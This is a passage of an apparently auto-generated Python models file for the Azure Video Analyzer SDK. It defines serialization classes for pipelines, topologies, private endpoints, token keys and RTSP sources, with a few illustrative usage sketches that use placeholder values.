**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
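# Illustrative sketch (not part of the generated models): network access is controlled per
# endpoint group; each group takes a GroupLevelAccessControl whose public network access is
# either "Enabled" or "Disabled".
def _example_network_access_control():
    return NetworkAccessControl(
        integration=GroupLevelAccessControl(public_network_access='Disabled'),
        ingestion=GroupLevelAccessControl(public_network_access='Enabled'),
        consumption=GroupLevelAccessControl(public_network_access='Enabled'),
    )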
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline whose output is used
as input to the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
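# Illustrative sketch (not part of the generated models): ParameterDeclaration belongs to the
# topology (name, type, optional default), while ParameterDefinition supplies the concrete value
# in an individual pipeline. The parameter name and URL below are hypothetical.
def _example_parameter_pairing():
    declaration = ParameterDeclaration(
        name='rtspUrl',
        type='String',
        description='RTSP endpoint of the camera',
    )
    definition = ParameterDefinition(name=declaration.name, value='rtsp://camera1.example.com/stream')
    return declaration, definition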
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by which this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by which this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
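# Illustrative sketch (editor's note, not part of the generated models): a minimal
# PipelineJobUpdate that re-targets a job's topology and refreshes its description. The
# topology name and description below are placeholders; instance-level overrides would be
# supplied as ParameterDefinition items via the ``parameters`` kwarg.
def _example_pipeline_job_update():
    return PipelineJobUpdate(
        topology_name="export-topology",
        description="Nightly export job with an updated description.",
    )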
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
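# Illustrative sketch (editor's note, not part of the generated models): a minimal live
# PipelineTopology with a single RTSP source. The "${rtspUrl}", "${rtspUserName}" and
# "${rtspPassword}" strings follow the "${PARAMETER_NAME}" substitution pattern described
# above and assume matching ParameterDeclaration entries; processors and sinks would be
# appended the same way. All names and the SKU choice are placeholders.
def _example_live_pipeline_topology():
    return PipelineTopology(
        kind="Live",
        sku=Sku(name="Live_S1"),
        description="Capture from an RTSP camera; processors/sinks omitted for brevity.",
        sources=[
            RtspSource(
                name="rtspSource",
                transport="Tcp",
                endpoint=UnsecuredEndpoint(
                    url="${rtspUrl}",
                    credentials=UsernamePasswordCredentials(
                        username="${rtspUserName}",
                        password="${rtspPassword}",
                    ),
                ),
            )
        ],
    )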
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
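# Illustrative sketch (editor's note, not part of the generated models): an RsaTokenKey
# validation entry. "example-key-id" and the modulus/exponent values are placeholders; real
# values carry the base64url-encoded RSA public key parameters published by the JWT issuer.
def _example_rsa_token_key():
    return RsaTokenKey(
        kid="example-key-id",
        alg="RS256",
        n="<base64url-encoded-modulus>",
        e="AQAB",
    )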
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long-lived HTTP connections, and the RTP packets are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
